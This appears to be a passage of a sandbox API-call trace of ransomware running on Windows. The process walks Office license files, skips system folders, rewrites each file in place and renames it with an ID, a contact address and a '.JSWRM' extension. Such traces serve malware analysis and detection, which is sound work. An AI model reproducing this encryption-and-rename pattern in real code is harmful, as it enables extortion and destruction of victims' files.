ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dd4, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AccessR_Retail-ul-phn.xrm-ms", cAlternateFileName="ACAF89~1.XRM")) returned 1 [0102.535] lstrcmpiW (lpString1="AccessR_Retail-ul-phn.xrm-ms", lpString2=".") returned 1 [0102.535] lstrcmpiW (lpString1="AccessR_Retail-ul-phn.xrm-ms", lpString2="..") returned 1 [0102.535] lstrcmpiW (lpString1="AccessR_Retail-ul-phn.xrm-ms", lpString2="...") returned 1 [0102.535] lstrcmpiW (lpString1="AccessR_Retail-ul-phn.xrm-ms", lpString2="windows") returned -1 [0102.535] lstrcmpiW (lpString1="AccessR_Retail-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0102.535] lstrcmpiW (lpString1="AccessR_Retail-ul-phn.xrm-ms", lpString2="perflogs") returned -1 [0102.535] lstrcmpiW (lpString1="AccessR_Retail-ul-phn.xrm-ms", lpString2="documents and settings") returned -1 [0102.535] lstrcmpiW (lpString1="AccessR_Retail-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.535] lstrcmpiW (lpString1="AccessR_Retail-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0102.536] lstrcmpiW (lpString1="AccessR_Retail-ul-phn.xrm-ms", lpString2="msocache") returned -1 [0102.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0102.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Retail-ul-phn.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0102.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0102.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Retail-ul-phn.xrm-ms", cchWideChar=28, lpMultiByteStr=0x2411f0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0102.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0102.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0102.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Retail-ul-phn.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0102.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0102.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Retail-ul-phn.xrm-ms", cchWideChar=28, lpMultiByteStr=0x2413d0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0102.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0102.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0102.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0102.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0102.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_retail-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.536] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19924) returned 1 [0102.536] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4dd0) returned 0x24c1d0 [0102.537] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4dd0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4dd0, lpOverlapped=0x0) returned 1 [0102.539] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.539] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4dd0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4dd0, lpOverlapped=0x0) returned 1 [0102.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.540] CloseHandle (hObject=0x45c) returned 1 [0102.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0102.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0102.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0102.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0102.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0102.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0102.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.540] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_retail-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Retail-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_retail-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0102.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0102.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0102.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0102.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0102.541] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe29a8e16, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe29a8e16, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe2cf0288, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b87, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AccessR_Trial-pl.xrm-ms", cAlternateFileName="AC69E2~1.XRM")) returned 1 [0102.541] lstrcmpiW (lpString1="AccessR_Trial-pl.xrm-ms", lpString2=".") returned 1 [0102.541] lstrcmpiW (lpString1="AccessR_Trial-pl.xrm-ms", lpString2="..") returned 1 [0102.541] lstrcmpiW (lpString1="AccessR_Trial-pl.xrm-ms", lpString2="...") returned 1 [0102.541] lstrcmpiW (lpString1="AccessR_Trial-pl.xrm-ms", lpString2="windows") returned -1 [0102.541] lstrcmpiW (lpString1="AccessR_Trial-pl.xrm-ms", lpString2="recovery") returned -1 [0102.541] lstrcmpiW (lpString1="AccessR_Trial-pl.xrm-ms", lpString2="perflogs") returned -1 [0102.541] lstrcmpiW (lpString1="AccessR_Trial-pl.xrm-ms", lpString2="documents and settings") returned -1 [0102.541] lstrcmpiW (lpString1="AccessR_Trial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.541] lstrcmpiW (lpString1="AccessR_Trial-pl.xrm-ms", lpString2="system volume information") returned -1 [0102.541] lstrcmpiW (lpString1="AccessR_Trial-pl.xrm-ms", lpString2="msocache") returned -1 [0102.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Trial-pl.xrm-ms", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0102.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0102.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Trial-pl.xrm-ms", cchWideChar=23, lpMultiByteStr=0x2410d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 23 [0102.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Trial-pl.xrm-ms", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0102.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0102.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Trial-pl.xrm-ms", cchWideChar=23, lpMultiByteStr=0x241038, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 23 [0102.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0102.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0102.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0102.542] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_trial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.543] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11143) returned 1 [0102.543] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b80) returned 0x24c1d0 [0102.543] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2b80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2b80, lpOverlapped=0x0) returned 1 [0102.545] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.545] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2b80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2b80, lpOverlapped=0x0) returned 1 [0102.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.546] CloseHandle (hObject=0x45c) returned 1 [0102.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0102.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0102.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0102.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0102.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0102.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0102.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.546] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_trial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Trial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_trial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0102.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0102.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0102.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0102.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0102.548] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe2982ba2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe2982ba2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe2b72a71, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x51a5, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AccessR_Trial-ppd.xrm-ms", cAlternateFileName="AC7797~1.XRM")) returned 1 [0102.548] lstrcmpiW (lpString1="AccessR_Trial-ppd.xrm-ms", lpString2=".") returned 1 [0102.548] lstrcmpiW (lpString1="AccessR_Trial-ppd.xrm-ms", lpString2="..") returned 1 [0102.548] lstrcmpiW (lpString1="AccessR_Trial-ppd.xrm-ms", lpString2="...") returned 1 [0102.548] lstrcmpiW (lpString1="AccessR_Trial-ppd.xrm-ms", lpString2="windows") returned -1 [0102.548] lstrcmpiW (lpString1="AccessR_Trial-ppd.xrm-ms", lpString2="recovery") returned -1 [0102.548] lstrcmpiW (lpString1="AccessR_Trial-ppd.xrm-ms", lpString2="perflogs") returned -1 [0102.548] lstrcmpiW (lpString1="AccessR_Trial-ppd.xrm-ms", lpString2="documents and settings") returned -1 [0102.548] lstrcmpiW (lpString1="AccessR_Trial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.548] lstrcmpiW (lpString1="AccessR_Trial-ppd.xrm-ms", lpString2="system volume information") returned -1 [0102.548] lstrcmpiW (lpString1="AccessR_Trial-ppd.xrm-ms", lpString2="msocache") returned -1 [0102.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0102.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Trial-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0102.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0102.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Trial-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x2412b8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0102.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0102.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0102.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Trial-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0102.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0102.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Trial-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x241128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0102.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0102.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0102.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0102.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0102.548] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_trial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.549] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20901) returned 1 [0102.549] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51a0) returned 0x24c1d0 [0102.549] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x51a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x51a0, lpOverlapped=0x0) returned 1 [0102.552] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.552] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x51a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x51a0, lpOverlapped=0x0) returned 1 [0102.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.552] CloseHandle (hObject=0x45c) returned 1 [0102.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0102.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0102.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0102.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0102.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0102.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0102.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0102.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0102.553] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_trial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Trial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_trial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0102.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0102.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0102.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0102.553] 